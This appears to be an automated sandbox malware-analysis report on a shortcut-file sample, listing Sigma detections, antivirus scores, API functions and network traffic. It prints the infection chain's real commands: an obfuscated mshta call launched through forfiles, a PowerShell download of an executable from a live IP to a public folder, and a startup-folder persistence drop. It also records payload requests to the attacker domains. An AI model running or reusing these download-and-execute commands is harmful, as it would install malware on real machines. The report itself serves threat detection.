Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7448, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 6244, ProcessName: SwiftWrite.pif
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5612, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5612, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5612, ProcessName: powershell.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7448, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, CommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 5336, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, ProcessId: 612, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3652, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7052, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: R4qP4YM0QX.lnkReversingLabs: Detection: 18%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49837 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49869 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49920 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49926 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49982 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50044 version: TLS 1.2
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000004.00000003.2403385362.0000022B398AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2406037810.0000022B398A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403876384.0000022B39828000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2406037810.0000022B398AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2402966513.0000022B39898000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403739955.0000022B398B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404327549.0000022B398B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403439100.0000022B398A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2419400700.0000022B3EE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404362707.0000022B3EE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2406694141.0000022B398B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2419180158.0000022B398B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404539888.0000022B3EE67000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000004.00000003.2403876384.0000022B39828000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2402966513.0000022B39898000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2419400700.0000022B3EE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404362707.0000022B3EE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404539888.0000022B3EE67000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00007FF656D2C7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF656D2B7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D371F4 FindFirstFileW,FindClose,19_2_00007FF656D371F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D372A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00007FF656D372A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF656D2BC70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00007FF656D3A874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D36428 FindFirstFileW,FindNextFileW,FindClose,19_2_00007FF656D36428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF656D3A350
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF656D3A4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF2F50 FindFirstFileExW,19_2_00007FF656CF2F50
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,30_2_003B4005
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B494A GetFileAttributesW,FindFirstFileW,FindClose,30_2_003B494A
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,30_2_003BC2FF
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BCD14 FindFirstFileW,FindClose,30_2_003BCD14
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,30_2_003BCD9F
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,30_2_003BF5D8
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,30_2_003BF735
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,30_2_003BFA36
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,30_2_003B3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B44005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B44005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4494A GetFileAttributesW,FindFirstFileW,FindClose,35_2_00B4494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,35_2_00B4C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,35_2_00B4CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4CD14 FindFirstFileW,FindClose,35_2_00B4CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B4F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B4F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,35_2_00B4FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B43CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B43CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 20:06:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 15 Dec 2024 10:29:42 GMTETag: "da2a8-6294c8abc9816"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0d 00 00 04 00 00 15 cd 0d 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc d0 0b 00 7c 01 00 00 00 90 0c 00 50 d7 00 00 00 00 00 00 00 00 00 00 00 86 0d 00 a8 1c 00 00 00 70 0d 00 ac 71 00 00 90 3b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5b 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: GET /New_2025.webp HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PefjSkkhb.exe HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /QWCheljD.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /FILEANH HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418563_16RSKIH5RQZW91ZBH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418564_10W6V5F7I280O8R44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381742051_1MZLGS7MGWEW2J3U5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381742050_1SU74Q4K5S59B84Q9&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418547_1N5DXBL93QHFGMSRD&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418548_1UEU8RPM3S7H7G0D8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /kiiMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
